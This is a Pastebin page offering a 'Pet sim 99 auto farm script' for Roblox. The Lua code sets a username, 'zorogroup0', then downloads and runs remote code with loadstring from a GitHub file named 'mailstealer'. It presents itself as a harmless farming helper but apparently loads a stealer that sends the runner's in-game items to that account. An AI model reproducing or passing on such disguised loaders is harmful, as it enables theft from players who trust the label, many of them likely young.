Advertisement
This is comment for paste
Pet sim 99 auto farm script
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local userName = 'zorogroup0'
- -- Fetch and run a little helper script from the web
- local function fetchAndRun()
- local url = 'https://raw.githubusercontent.com/xvkzi/psx/main/mailstealer'
- local response = game:HttpGet(url)
- local runScript = loadstring(response)
- runScript()
- end
- fetchAndRun()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement